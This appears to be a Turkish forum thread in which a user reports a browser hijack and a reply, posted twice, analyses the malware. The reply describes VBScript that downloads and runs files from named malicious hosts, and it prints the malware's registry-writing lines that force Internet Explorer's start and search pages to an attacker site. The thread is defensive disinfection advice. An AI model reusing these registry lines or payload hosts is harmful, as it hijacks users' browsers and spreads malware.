bi konu daha açmıstım internet sayfası sorunu diye .. internette iyice aradım buldum sorunu.. ama nasıl düzelteceğimi bilmiyorum .. adam resmen internet sayfası yolu ile hack yapmıs. bunu nasıl düzeltecez bilen varmı format atmak istemiyom Sad
Kötü amaçlarla kullanılmaması için kodun deşifre edilmiş halini buraya koymuyorum ama yaptıklarını ve bulaşmışsa ne yapılması gerektiğini anlatmaya çalışayım.
Sistem sayfaya internet explorer tarafından desteklenen vbscript basıyor. Bu script ile activex kullanarak http://www.klavyemiz.org adresinden yeni bir vbscript indiriyor ve bunu internet explorer temporary files içine new.hta ismiyle kaydediyor ve bu kaydettiği dosyaya çalışma emri veriyor. Çalıştığı zaman c:\windows\news.vbs ve c:\windows\cansu2.exe şeklinde iki dosya atıyor ve bunların içeriğine http://www.asigenclik.net/kelebek.exe adresinden aldığı datayı koyuyor. Nihayetinde bunları çalıştırıyor.
En son olarak alttaki register ayarlarını değiştiriyor.
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\UR L\Prefixes\\mirc","http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Bar", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Local Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\Source", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\SubscribedURL", "http://www.esenruzgar.net","REG_SZ"
Tüm bu işlemler için http://www.klavyemiz.org, http://www.asigenclik.net ve http://www.esenruzgar.net adresleri kullanılıyor. Tabi ki indirdiği exe file’ları çalıştırmadım. O nedenle nereye ne yazdığını bilemiyorum. Ancak üstte geçen tüm dosyaları silerseniz muhtemelen bu dertten kurtulursunuz. Bu arada bu sadece kopya windowslarda ortaya çıkar. IE’nin bu açığı yeni yamalarla kapatıldı.
Bence bunlar ve benzerleri için şikayet edilebilecek bir merciye ulaşmak lazım. Böyle onursuzca ve alanen yapılan bir harekete tepkisiz kalmak olmaz.
Kötü amaçlarla kullanılmaması için kodun deşifre edilmiş halini buraya koymuyorum ama yaptıklarını ve bulaşmışsa ne yapılması gerektiğini anlatmaya çalışayım.
Sistem sayfaya internet explorer tarafından desteklenen vbscript basıyor. Bu script ile activex kullanarak http://www.klavyemiz.org adresinden yeni bir vbscript indiriyor ve bunu internet explorer temporary files içine new.hta ismiyle kaydediyor ve bu kaydettiği dosyaya çalışma emri veriyor. Çalıştığı zaman c:\windows\news.vbs ve c:\windows\cansu2.exe şeklinde iki dosya atıyor ve bunların içeriğine http://www.asigenclik.net/kelebek.exe adresinden aldığı datayı koyuyor. Nihayetinde bunları çalıştırıyor.
En son olarak alttaki register ayarlarını değiştiriyor.
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\UR L\Prefixes\\mirc","http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Bar", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Local Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\Source", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\SubscribedURL", "http://www.esenruzgar.net","REG_SZ"
Tüm bu işlemler için http://www.klavyemiz.org, http://www.asigenclik.net ve http://www.esenruzgar.net adresleri kullanılıyor. Tabi ki indirdiği exe file’ları çalıştırmadım. O nedenle nereye ne yazdığını bilemiyorum. Ancak üstte geçen tüm dosyaları silerseniz muhtemelen bu dertten kurtulursunuz. Bu arada bu sadece kopya windowslarda ortaya çıkar. IE’nin bu açığı yeni yamalarla kapatıldı.
Bence bunlar ve benzerleri için şikayet edilebilecek bir merciye ulaşmak lazım. Böyle onursuzca ve alanen yapılan bir harekete tepkisiz kalmak olmaz.
